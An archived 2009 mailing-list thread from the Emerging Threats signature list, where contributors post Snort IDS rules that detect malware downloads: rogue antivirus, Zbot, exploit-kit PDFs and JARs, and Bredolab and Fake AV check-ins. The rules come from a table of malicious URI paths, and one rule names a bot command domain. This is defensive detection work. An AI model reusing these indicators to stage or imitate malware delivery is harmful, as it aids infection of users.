> On Dec 2, 2009, at 9:30 AM, Mike Cox wrote:
>
> > Thanks for this intel Jason.  I know these are simple signatures but I
> figure I'd beat Kevin Ross to it:
> >
> > alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"ET
> CURRENT_EVENTS MALWARE Potential Malware Download, rogue antivirus
> downloader (installer.1.exe)"; flow:established,to_server;
> uricontent:"/installer.1.exe"; nocase; classtype:bad-unknown; reference:url,
> malwareurl.com; reference:url,
> www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/CURRENT_EVENTS/CURRENT_Malwareurl_top_downloads;
> sid:2010xxx; rev:1;)
> >
> > alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"ET
> CURRENT_EVENTS MALWARE Potential Malware Download, pdf exploit";
> flow:established,to_server; uricontent:"/ssp/files/annonce.pdf"; nocase;
> classtype:bad-unknown; reference:url,malwareurl.com; reference:url,
> www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/CURRENT_EVENTS/CURRENT_Malwareurl_top_downloads;
> sid:2010xxx; rev:1;)
> >
> > alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"ET
> CURRENT_EVENTS MALWARE Potential Malware Download, java exploit";
> flow:established,to_server; uricontent:"/ssp/files/sdfg.jar"; nocase;
> classtype:bad-unknown; reference:url,malwareurl.com; reference:url,
> www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/CURRENT_EVENTS/CURRENT_Malwareurl_top_downloads;
> sid:2010xxx; rev:1;)
> >
> > alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"ET
> CURRENT_EVENTS MALWARE Potential Malware Download, loadjavad.php exploit";
> flow:established,to_server; uricontent:"/ssp/loadjavad.php"; nocase;
> classtype:bad-unknown; reference:url,malwareurl.com; reference:url,
> www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/CURRENT_EVENTS/CURRENT_Malwareurl_top_downloads;
> sid:2010xxx; rev:1;)
> >
> > alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"ET
> CURRENT_EVENTS MALWARE Potential Malware Download, rogue antivirus
> (IAInstall.exe)"; flow:established,to_server;
> uricontent:"/download/IAInstall.exe"; nocase; classtype:bad-unknown;
> reference:url,malwareurl.com; reference:url,
> www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/CURRENT_EVENTS/CURRENT_Malwareurl_top_downloads;
> sid:2010xxx; rev:1;)
> >
> > alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"ET
> CURRENT_EVENTS MALWARE Potential Malware Download, trojan zbot";
> flow:established,to_server; uricontent:"/globaldirectory/updatetool.exe";
> nocase; classtype:bad-unknown; reference:url,malwareurl.com;
> reference:url,
> www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/CURRENT_EVENTS/CURRENT_Malwareurl_top_downloads;
> sid:2010xxx; rev:1;)
> >
> > alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"ET
> CURRENT_EVENTS MALWARE Potential Malware Download, exploit redirect";
> flow:established,to_server; uricontent:"/fkzd/2.htm"; nocase;
> classtype:bad-unknown; reference:url,malwareurl.com; reference:url,
> www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/CURRENT_EVENTS/CURRENT_Malwareurl_top_downloads;
> sid:2010xxx; rev:1;)
> >
> > Finally, I know SID 2010050 covers this but here is how I would do it:
> >
> > alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"ET
> CURRENT_EVENTS MALWARE Potential Malware Download, rogue antivirus";
> flow:established,to_server; uricontent:"/download/Antivirus_"; nocase;
> uricontent:".exe"; nocase; pcre:"/download\x2FAntivirus_\d+\x2Eexe/Ui";
> classtype:bad-unknown; reference:url,malwareurl.com; reference:url,
> www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/CURRENT_EVENTS/CURRENT_Malwareurl_top_downloads;
> sid:2010xxx; rev:1;)
> >
> > -Mike Cox
> >
> > On Wed, Dec 2, 2009 at 6:51 AM, <jason.weir at nhrs.org> wrote:
> > MalewareURL.com Data Contains 29827 Entries - Here are the top 30 (6417)
> >
> > #    Signature       URI
>  Count    Description
> >
> ----------------------------------------------------------------------------------------
> >
> > 1    none            cache/readme.pdf
> 941      exploits / redirects to exploits
> > 2    none            index.php
>  919      exploits / redirects to exploits
> > 3    2010222         ts/in.cgi?pepsi18
>  895      exploits / redirects to exploits
> > 4    none            download/install.php
> 296      rogue antivirus downloader / internetantiviruspro
> > 5    none            cache/flash.swf
>  276      exploits / redirects to exploits
> > 6    new             downloader.php
> 180      fraudtool.win32.roguesecurity
> > 7    2010440         flash-HQ-plugin.40000.exe
>  167      fast flux trojan
> > 8    2010050         download/Antivirus_21.exe
>  149      rogue antivirus / personal antivirus - fakexpa
> > 9    none            installer.1.exe
>  147      rogue antivirus downloader / fakeplus
> > 10   new             ssp/js/common.js
> 138      exploit kit / trojan oficla
> > 11   new             ssp/files/annonce.pdf
>  138      exploit kit / trojan oficla
> > 12   new             ssp/files/sdfg.jar
> 138      exploit kit / trojan oficla
> > 13   new             ssp/admin.php
>  138      exploit kit / trojan oficla
> > 14   new             ssp/index.php
>  138      exploit kit / trojan oficla
> > 15   new             ssp/load.exe
> 138      exploit kit / trojan oficla
> > 16   new             ssp/loadjavad.php
>  138      exploit kit / trojan oficla
> > 17   new             download/IAInstall.exe
> 125      rogue antivirus downloader / internetantiviruspro
> > 18   none            index.php
>  123      exploits
> > 19   2010221         3/installer/Installer.exe
>  123      trojan fakerean
> > 20   2010221         1/installer/Installer.exe
>  123      trojan fakerean
> > 21   2010221         2/installer/Installer.exe
>  123      trojan fakerean
> > 22   new             rsf/loadjavad.php
>  111      exploits / trojan oficla
> > 23   new             rsf/files/annonce.pdf
>  111      exploits / trojan oficla
> > 24   new             rsf/files/sdfg.jar
> 111      exploits / trojan oficla
> > 25   new             rsf/js/common.js
> 111      exploits / trojan oficla
> > 26   new             rsf/index.php
>  111      exploits / trojan oficla
> > 27   new             hitin.php
>  89       fraudtool.win32.roguesecurity
> > 28   none            download.php
> 82       fraudtool.win32.roguesecurity
> > 29   none            fkzd/2.htm
> 70       directs to exploits
> > 30   new             globaldirectory/updatetool.exe
> 68       trojan zbot
> > _______________________________________________
> > Emerging-sigs mailing list
> > Emerging-sigs at emergingthreats.net
> > http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs
> >
> > _______________________________________________
> > Emerging-sigs mailing list
> > Emerging-sigs at emergingthreats.net
> > http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs
>
>
> ----------------------------------------------------
> Matthew Jonkman
> Emerging Threats
> Open Information Security Foundation (OISF)
> Phone 765-429-0398
> Fax 312-264-0205
> http://www.emergingthreats.net
> http://www.openinformationsecurityfoundation.org
> ----------------------------------------------------
>
> PGP: http://www.jonkmans.com/mattjonkman.asc
>
>
>
> _______________________________________________
> Emerging-sigs mailing list
> Emerging-sigs at emergingthreats.net
> http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs
>
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.emergingthreats.net/pipermail/emerging-sigs/attachments/20091203/c840f95f/attachment-0001.html

From jaime.blasco at alienvault.com  Thu Dec  3 16:43:28 2009
From: jaime.blasco at alienvault.com (Jaime Blasco)
Date: Thu, 3 Dec 2009 22:43:28 +0100
Subject: [Emerging-Sigs] Malwareurl.com Top 30 Update
In-Reply-To: <e75cc74a0912031331u2963e2f6s3cbb09592c2600a6@mail.gmail.com>
References: <MAILW1GVKjj5EYhAewO00000011@mail.nhrs.org>
	<6116b9e20912020630o41a5df3cm9c319dfdfa3b437e@mail.gmail.com>
	<AF797123-E374-4A63-BEA8-59ADED4B0186@jonkmans.com>
	<e75cc74a0912031331u2963e2f6s3cbb09592c2600a6@mail.gmail.com>
Message-ID: <53834cf20912031343v498c210fkcd83179ef2249576@mail.gmail.com>

I' ve received my mug too, but i'm pleased to know that my malwareurl idea
helps others to get his own mug too. ;);)

Regards

2009/12/3 Kevin Ross <kevross33 at googlemail.com>

> lol :) I am not in any rush to write lots of sigs, I have my mug now :) Now
> I am improving on my very first snort sigs that work but possibly could be
> tweaked for performance.
>
> Kev
>
> 2009/12/3 Matt Jonkman <jonkman at jonkmans.com>
>
> You do have to be quick to beat Kevin! :)
>>
>> Posting these now, thanks Mike!
>>
>> Matt
>>
>> On Dec 2, 2009, at 9:30 AM, Mike Cox wrote:
>>
>> > Thanks for this intel Jason.  I know these are simple signatures but I
>> figure I'd beat Kevin Ross to it:
>> >
>> > alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"ET
>> CURRENT_EVENTS MALWARE Potential Malware Download, rogue antivirus
>> downloader (installer.1.exe)"; flow:established,to_server;
>> uricontent:"/installer.1.exe"; nocase; classtype:bad-unknown; reference:url,
>> malwareurl.com; reference:url,
>> www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/CURRENT_EVENTS/CURRENT_Malwareurl_top_downloads;
>> sid:2010xxx; rev:1;)
>> >
>> > alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"ET
>> CURRENT_EVENTS MALWARE Potential Malware Download, pdf exploit";
>> flow:established,to_server; uricontent:"/ssp/files/annonce.pdf"; nocase;
>> classtype:bad-unknown; reference:url,malwareurl.com; reference:url,
>> www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/CURRENT_EVENTS/CURRENT_Malwareurl_top_downloads;
>> sid:2010xxx; rev:1;)
>> >
>> > alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"ET
>> CURRENT_EVENTS MALWARE Potential Malware Download, java exploit";
>> flow:established,to_server; uricontent:"/ssp/files/sdfg.jar"; nocase;
>> classtype:bad-unknown; reference:url,malwareurl.com; reference:url,
>> www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/CURRENT_EVENTS/CURRENT_Malwareurl_top_downloads;
>> sid:2010xxx; rev:1;)
>> >
>> > alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"ET
>> CURRENT_EVENTS MALWARE Potential Malware Download, loadjavad.php exploit";
>> flow:established,to_server; uricontent:"/ssp/loadjavad.php"; nocase;
>> classtype:bad-unknown; reference:url,malwareurl.com; reference:url,
>> www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/CURRENT_EVENTS/CURRENT_Malwareurl_top_downloads;
>> sid:2010xxx; rev:1;)
>> >
>> > alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"ET
>> CURRENT_EVENTS MALWARE Potential Malware Download, rogue antivirus
>> (IAInstall.exe)"; flow:established,to_server;
>> uricontent:"/download/IAInstall.exe"; nocase; classtype:bad-unknown;
>> reference:url,malwareurl.com; reference:url,
>> www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/CURRENT_EVENTS/CURRENT_Malwareurl_top_downloads;
>> sid:2010xxx; rev:1;)
>> >
>> > alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"ET
>> CURRENT_EVENTS MALWARE Potential Malware Download, trojan zbot";
>> flow:established,to_server; uricontent:"/globaldirectory/updatetool.exe";
>> nocase; classtype:bad-unknown; reference:url,malwareurl.com;
>> reference:url,
>> www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/CURRENT_EVENTS/CURRENT_Malwareurl_top_downloads;
>> sid:2010xxx; rev:1;)
>> >
>> > alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"ET
>> CURRENT_EVENTS MALWARE Potential Malware Download, exploit redirect";
>> flow:established,to_server; uricontent:"/fkzd/2.htm"; nocase;
>> classtype:bad-unknown; reference:url,malwareurl.com; reference:url,
>> www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/CURRENT_EVENTS/CURRENT_Malwareurl_top_downloads;
>> sid:2010xxx; rev:1;)
>> >
>> > Finally, I know SID 2010050 covers this but here is how I would do it:
>> >
>> > alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"ET
>> CURRENT_EVENTS MALWARE Potential Malware Download, rogue antivirus";
>> flow:established,to_server; uricontent:"/download/Antivirus_"; nocase;
>> uricontent:".exe"; nocase; pcre:"/download\x2FAntivirus_\d+\x2Eexe/Ui";
>> classtype:bad-unknown; reference:url,malwareurl.com; reference:url,
>> www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/CURRENT_EVENTS/CURRENT_Malwareurl_top_downloads;
>> sid:2010xxx; rev:1;)
>> >
>> > -Mike Cox
>> >
>> > On Wed, Dec 2, 2009 at 6:51 AM, <jason.weir at nhrs.org> wrote:
>> > MalewareURL.com Data Contains 29827 Entries - Here are the top 30 (6417)
>> >
>> > #    Signature       URI
>>  Count    Description
>> >
>> ----------------------------------------------------------------------------------------
>> >
>> > 1    none            cache/readme.pdf
>> 941      exploits / redirects to exploits
>> > 2    none            index.php
>>  919      exploits / redirects to exploits
>> > 3    2010222         ts/in.cgi?pepsi18
>>  895      exploits / redirects to exploits
>> > 4    none            download/install.php
>> 296      rogue antivirus downloader / internetantiviruspro
>> > 5    none            cache/flash.swf
>>  276      exploits / redirects to exploits
>> > 6    new             downloader.php
>> 180      fraudtool.win32.roguesecurity
>> > 7    2010440         flash-HQ-plugin.40000.exe
>>  167      fast flux trojan
>> > 8    2010050         download/Antivirus_21.exe
>>  149      rogue antivirus / personal antivirus - fakexpa
>> > 9    none            installer.1.exe
>>  147      rogue antivirus downloader / fakeplus
>> > 10   new             ssp/js/common.js
>> 138      exploit kit / trojan oficla
>> > 11   new             ssp/files/annonce.pdf
>>  138      exploit kit / trojan oficla
>> > 12   new             ssp/files/sdfg.jar
>> 138      exploit kit / trojan oficla
>> > 13   new             ssp/admin.php
>>  138      exploit kit / trojan oficla
>> > 14   new             ssp/index.php
>>  138      exploit kit / trojan oficla
>> > 15   new             ssp/load.exe
>> 138      exploit kit / trojan oficla
>> > 16   new             ssp/loadjavad.php
>>  138      exploit kit / trojan oficla
>> > 17   new             download/IAInstall.exe
>> 125      rogue antivirus downloader / internetantiviruspro
>> > 18   none            index.php
>>  123      exploits
>> > 19   2010221         3/installer/Installer.exe
>>  123      trojan fakerean
>> > 20   2010221         1/installer/Installer.exe
>>  123      trojan fakerean
>> > 21   2010221         2/installer/Installer.exe
>>  123      trojan fakerean
>> > 22   new             rsf/loadjavad.php
>>  111      exploits / trojan oficla
>> > 23   new             rsf/files/annonce.pdf
>>  111      exploits / trojan oficla
>> > 24   new             rsf/files/sdfg.jar
>> 111      exploits / trojan oficla
>> > 25   new             rsf/js/common.js
>> 111      exploits / trojan oficla
>> > 26   new             rsf/index.php
>>  111      exploits / trojan oficla
>> > 27   new             hitin.php
>>  89       fraudtool.win32.roguesecurity
>> > 28   none            download.php
>> 82       fraudtool.win32.roguesecurity
>> > 29   none            fkzd/2.htm
>> 70       directs to exploits
>> > 30   new             globaldirectory/updatetool.exe
>> 68       trojan zbot
>> > _______________________________________________
>> > Emerging-sigs mailing list
>> > Emerging-sigs at emergingthreats.net
>> > http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs
>> >
>> > _______________________________________________
>> > Emerging-sigs mailing list
>> > Emerging-sigs at emergingthreats.net
>> > http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs
>>
>>
>> ----------------------------------------------------
>> Matthew Jonkman
>> Emerging Threats
>> Open Information Security Foundation (OISF)
>> Phone 765-429-0398
>> Fax 312-264-0205
>> http://www.emergingthreats.net
>> http://www.openinformationsecurityfoundation.org
>> ----------------------------------------------------
>>
>> PGP: http://www.jonkmans.com/mattjonkman.asc
>>
>>
>>
>> _______________________________________________
>> Emerging-sigs mailing list
>> Emerging-sigs at emergingthreats.net
>> http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs
>>
>
>
> _______________________________________________
> Emerging-sigs mailing list
> Emerging-sigs at emergingthreats.net
> http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs
>
>


-- 
_______________________________

Jaime Blasco

www.ossim.com
www.alienvault.com
Email: jaime.blasco at alienvault.com
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.emergingthreats.net/pipermail/emerging-sigs/attachments/20091203/91df6e3c/attachment.html

From kevross33 at googlemail.com  Thu Dec  3 16:56:32 2009
From: kevross33 at googlemail.com (Kevin Ross)
Date: Thu, 3 Dec 2009 21:56:32 +0000
Subject: [Emerging-Sigs] Malwareurl.com Top 30 Update
In-Reply-To: <53834cf20912031343v498c210fkcd83179ef2249576@mail.gmail.com>
References: <MAILW1GVKjj5EYhAewO00000011@mail.nhrs.org>
	<6116b9e20912020630o41a5df3cm9c319dfdfa3b437e@mail.gmail.com>
	<AF797123-E374-4A63-BEA8-59ADED4B0186@jonkmans.com>
	<e75cc74a0912031331u2963e2f6s3cbb09592c2600a6@mail.gmail.com>
	<53834cf20912031343v498c210fkcd83179ef2249576@mail.gmail.com>
Message-ID: <e75cc74a0912031356o66a4d3f9pc731ef1afb0b5e5d@mail.gmail.com>

lol I think I only did a few malware url sigs. I mostly like to try
vulnerability sigs (both to cover myself and to learn more, especially with
sigs which involve things like byte_test byte_jump etc as I am pretty weak
there) and scanner sigs (I like to catch people early).

I think Joomla's vulnerabilities is what got me my mug though lol. I went
quite a few months writing sigs for scanners, vulnerabilities etc and always
lost in the eleventh hour, then it was a case of lets write Joomla sigs lol.


2009/12/3 Jaime Blasco <jaime.blasco at alienvault.com>

> I' ve received my mug too, but i'm pleased to know that my malwareurl idea
> helps others to get his own mug too. ;);)
>
> Regards
>
> 2009/12/3 Kevin Ross <kevross33 at googlemail.com>
>
> lol :) I am not in any rush to write lots of sigs, I have my mug now :) Now
>> I am improving on my very first snort sigs that work but possibly could be
>> tweaked for performance.
>>
>> Kev
>>
>> 2009/12/3 Matt Jonkman <jonkman at jonkmans.com>
>>
>> You do have to be quick to beat Kevin! :)
>>>
>>> Posting these now, thanks Mike!
>>>
>>> Matt
>>>
>>> On Dec 2, 2009, at 9:30 AM, Mike Cox wrote:
>>>
>>> > Thanks for this intel Jason.  I know these are simple signatures but I
>>> figure I'd beat Kevin Ross to it:
>>> >
>>> > alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"ET
>>> CURRENT_EVENTS MALWARE Potential Malware Download, rogue antivirus
>>> downloader (installer.1.exe)"; flow:established,to_server;
>>> uricontent:"/installer.1.exe"; nocase; classtype:bad-unknown; reference:url,
>>> malwareurl.com; reference:url,
>>> www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/CURRENT_EVENTS/CURRENT_Malwareurl_top_downloads;
>>> sid:2010xxx; rev:1;)
>>> >
>>> > alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"ET
>>> CURRENT_EVENTS MALWARE Potential Malware Download, pdf exploit";
>>> flow:established,to_server; uricontent:"/ssp/files/annonce.pdf"; nocase;
>>> classtype:bad-unknown; reference:url,malwareurl.com; reference:url,
>>> www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/CURRENT_EVENTS/CURRENT_Malwareurl_top_downloads;
>>> sid:2010xxx; rev:1;)
>>> >
>>> > alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"ET
>>> CURRENT_EVENTS MALWARE Potential Malware Download, java exploit";
>>> flow:established,to_server; uricontent:"/ssp/files/sdfg.jar"; nocase;
>>> classtype:bad-unknown; reference:url,malwareurl.com; reference:url,
>>> www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/CURRENT_EVENTS/CURRENT_Malwareurl_top_downloads;
>>> sid:2010xxx; rev:1;)
>>> >
>>> > alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"ET
>>> CURRENT_EVENTS MALWARE Potential Malware Download, loadjavad.php exploit";
>>> flow:established,to_server; uricontent:"/ssp/loadjavad.php"; nocase;
>>> classtype:bad-unknown; reference:url,malwareurl.com; reference:url,
>>> www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/CURRENT_EVENTS/CURRENT_Malwareurl_top_downloads;
>>> sid:2010xxx; rev:1;)
>>> >
>>> > alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"ET
>>> CURRENT_EVENTS MALWARE Potential Malware Download, rogue antivirus
>>> (IAInstall.exe)"; flow:established,to_server;
>>> uricontent:"/download/IAInstall.exe"; nocase; classtype:bad-unknown;
>>> reference:url,malwareurl.com; reference:url,
>>> www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/CURRENT_EVENTS/CURRENT_Malwareurl_top_downloads;
>>> sid:2010xxx; rev:1;)
>>> >
>>> > alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"ET
>>> CURRENT_EVENTS MALWARE Potential Malware Download, trojan zbot";
>>> flow:established,to_server; uricontent:"/globaldirectory/updatetool.exe";
>>> nocase; classtype:bad-unknown; reference:url,malwareurl.com;
>>> reference:url,
>>> www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/CURRENT_EVENTS/CURRENT_Malwareurl_top_downloads;
>>> sid:2010xxx; rev:1;)
>>> >
>>> > alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"ET
>>> CURRENT_EVENTS MALWARE Potential Malware Download, exploit redirect";
>>> flow:established,to_server; uricontent:"/fkzd/2.htm"; nocase;
>>> classtype:bad-unknown; reference:url,malwareurl.com; reference:url,
>>> www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/CURRENT_EVENTS/CURRENT_Malwareurl_top_downloads;
>>> sid:2010xxx; rev:1;)
>>> >
>>> > Finally, I know SID 2010050 covers this but here is how I would do it:
>>> >
>>> > alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"ET
>>> CURRENT_EVENTS MALWARE Potential Malware Download, rogue antivirus";
>>> flow:established,to_server; uricontent:"/download/Antivirus_"; nocase;
>>> uricontent:".exe"; nocase; pcre:"/download\x2FAntivirus_\d+\x2Eexe/Ui";
>>> classtype:bad-unknown; reference:url,malwareurl.com; reference:url,
>>> www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/CURRENT_EVENTS/CURRENT_Malwareurl_top_downloads;
>>> sid:2010xxx; rev:1;)
>>> >
>>> > -Mike Cox
>>> >
>>> > On Wed, Dec 2, 2009 at 6:51 AM, <jason.weir at nhrs.org> wrote:
>>> > MalewareURL.com Data Contains 29827 Entries - Here are the top 30
>>> (6417)
>>> >
>>> > #    Signature       URI
>>>  Count    Description
>>> >
>>> ----------------------------------------------------------------------------------------
>>> >
>>> > 1    none            cache/readme.pdf
>>> 941      exploits / redirects to exploits
>>> > 2    none            index.php
>>>  919      exploits / redirects to exploits
>>> > 3    2010222         ts/in.cgi?pepsi18
>>>  895      exploits / redirects to exploits
>>> > 4    none            download/install.php
>>> 296      rogue antivirus downloader / internetantiviruspro
>>> > 5    none            cache/flash.swf
>>>  276      exploits / redirects to exploits
>>> > 6    new             downloader.php
>>> 180      fraudtool.win32.roguesecurity
>>> > 7    2010440         flash-HQ-plugin.40000.exe
>>>  167      fast flux trojan
>>> > 8    2010050         download/Antivirus_21.exe
>>>  149      rogue antivirus / personal antivirus - fakexpa
>>> > 9    none            installer.1.exe
>>>  147      rogue antivirus downloader / fakeplus
>>> > 10   new             ssp/js/common.js
>>> 138      exploit kit / trojan oficla
>>> > 11   new             ssp/files/annonce.pdf
>>>  138      exploit kit / trojan oficla
>>> > 12   new             ssp/files/sdfg.jar
>>> 138      exploit kit / trojan oficla
>>> > 13   new             ssp/admin.php
>>>  138      exploit kit / trojan oficla
>>> > 14   new             ssp/index.php
>>>  138      exploit kit / trojan oficla
>>> > 15   new             ssp/load.exe
>>> 138      exploit kit / trojan oficla
>>> > 16   new             ssp/loadjavad.php
>>>  138      exploit kit / trojan oficla
>>> > 17   new             download/IAInstall.exe
>>> 125      rogue antivirus downloader / internetantiviruspro
>>> > 18   none            index.php
>>>  123      exploits
>>> > 19   2010221         3/installer/Installer.exe
>>>  123      trojan fakerean
>>> > 20   2010221         1/installer/Installer.exe
>>>  123      trojan fakerean
>>> > 21   2010221         2/installer/Installer.exe
>>>  123      trojan fakerean
>>> > 22   new             rsf/loadjavad.php
>>>  111      exploits / trojan oficla
>>> > 23   new             rsf/files/annonce.pdf
>>>  111      exploits / trojan oficla
>>> > 24   new             rsf/files/sdfg.jar
>>> 111      exploits / trojan oficla
>>> > 25   new             rsf/js/common.js
>>> 111      exploits / trojan oficla
>>> > 26   new             rsf/index.php
>>>  111      exploits / trojan oficla
>>> > 27   new             hitin.php
>>>  89       fraudtool.win32.roguesecurity
>>> > 28   none            download.php
>>> 82       fraudtool.win32.roguesecurity
>>> > 29   none            fkzd/2.htm
>>> 70       directs to exploits
>>> > 30   new             globaldirectory/updatetool.exe
>>> 68       trojan zbot
>>> > _______________________________________________
>>> > Emerging-sigs mailing list
>>> > Emerging-sigs at emergingthreats.net
>>> > http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs
>>> >
>>> > _______________________________________________
>>> > Emerging-sigs mailing list
>>> > Emerging-sigs at emergingthreats.net
>>> > http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs
>>>
>>>
>>> ----------------------------------------------------
>>> Matthew Jonkman
>>> Emerging Threats
>>> Open Information Security Foundation (OISF)
>>> Phone 765-429-0398
>>> Fax 312-264-0205
>>> http://www.emergingthreats.net
>>> http://www.openinformationsecurityfoundation.org
>>> ----------------------------------------------------
>>>
>>> PGP: http://www.jonkmans.com/mattjonkman.asc
>>>
>>>
>>>
>>> _______________________________________________
>>> Emerging-sigs mailing list
>>> Emerging-sigs at emergingthreats.net
>>> http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs
>>>
>>
>>
>> _______________________________________________
>> Emerging-sigs mailing list
>> Emerging-sigs at emergingthreats.net
>> http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs
>>
>>
>
>
> --
> _______________________________
>
> Jaime Blasco
>
> www.ossim.com
> www.alienvault.com
> Email: jaime.blasco at alienvault.com
>
>
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.emergingthreats.net/pipermail/emerging-sigs/attachments/20091203/dc1e226e/attachment-0001.html

From gilout at gmail.com  Thu Dec  3 20:26:39 2009
From: gilout at gmail.com (gilou)
Date: Thu, 3 Dec 2009 18:26:39 -0700
Subject: [Emerging-Sigs] Two new signatures (Bredolab + FakeAV),
	and and 	proposed modification to SID 2009354
Message-ID: <617fc350912031726j398f8ddfide889ab566bc0e66@mail.gmail.com>

The "?ddos=" request is from Gibon.

As an additional reference, here is a ThreatExpert report for another
variant of Gibon:
http://www.threatexpert.com/report.aspx?md5=011d403b345672adc29846074e717865



> ------------------------------
>
> Date: Wed, 2 Dec 2009 12:43:08 -0700
> From: Darren Spruell <phatbuckett at gmail.com>
> Subject: Re: [Emerging-Sigs] Two new signatures (Bredolab + FakeAV),
> ? ? ? ?and and ? ? ? ? proposed modification to SID 2009354
> To: "evilghost at packetmail.net" <evilghost at packetmail.net>
> Cc: "emerging-sigs at emergingthreats.net"
> ? ? ? ?<emerging-sigs at emergingthreats.net>
> Message-ID:
> ? ? ? ?<839aec700912021143o3aaea5a5r7f193a4c0d340e29 at mail.gmail.com>
> Content-Type: text/plain; charset=ISO-8859-1
>
> The match on ?ddos=x7x29x1x36x32x27x16x29x32x31x17x27x7x36x29x18x30x9x33x27x13x29x0x7
> isn't Bredolab, it's something else (I presume a DDoS bot). The
> Bredolab communication is that referencing
> youaskedthedomain.cn/spl/controller.php[...].
>
> Anybody recognize it?
>
> DS
>
>
> On Mon, Nov 30, 2009 at 2:11 PM, evilghost at packetmail.net
> <evilghost at packetmail.net> wrote:
>> SID 2009354, based on http://threatexpert.com/report.aspx?md5=a5f94577d00d0306e4ef64bad30e5d37 I suggest changing the uricontent:"&entity="; to uricontent:"&entity";
>>
>> Proposed new signatures below:
>>
>> alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"ET TROJAN
>> Bredolab Checkin"; flow:to_server,established; content:"GET "; depth:4;
>> uricontent:"?ddos=x"; nocase; pcre:"/\x3Fddos\x3D(x\d{1,2}){5,}/Ui";
>> classtype:trojan-activity;
>> reference:url,threatexpert.com/report.aspx?md5=a5f94577d00d0306e4ef64bad30e5d37;
>> reference:url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/VIRUS/TROJAN_Bredolab;
>> sid:2009xxx; rev:1;)
>>
>> alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"ET TROJAN Fake
>> AV GET"; flow:established,to_server; content:"GET "; depth:4;
>> uricontent:".php?"; nocase; uricontent:"affid="; nocase;
>> uricontent:"subid="; nocase; uricontent:"type="; nocase;
>> uricontent:"version="; nocase; uricontent:"adware"; nocase;
>> classtype:trojan-activity;
>> reference:url,threatexpert.com/report.aspx?md5=8d1b47452307259f1e191e16ed23cd35;
>> sid:2009xxx; rev:1;)
>>
>> Comments/flames welcome.
>>
>> -evilghost
>> _______________________________________________
>> Emerging-sigs mailing list
>> Emerging-sigs at emergingthreats.net
>> http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs
>>
>
>
>
> --
> Darren Spruell
> phatbuckett at gmail.com
>
>

From jonkman at jonkmans.com  Thu Dec  3 22:41:32 2009
From: jonkman at jonkmans.com (Matt Jonkman)
Date: Thu, 3 Dec 2009 22:41:32 -0500
Subject: [Emerging-Sigs] ET TROJAN Potential Gemini/Fake AV Download URL
	Detected
In-Reply-To: <6116b9e20912020743n5dd8de20t20234940e551230b@mail.gmail.com>
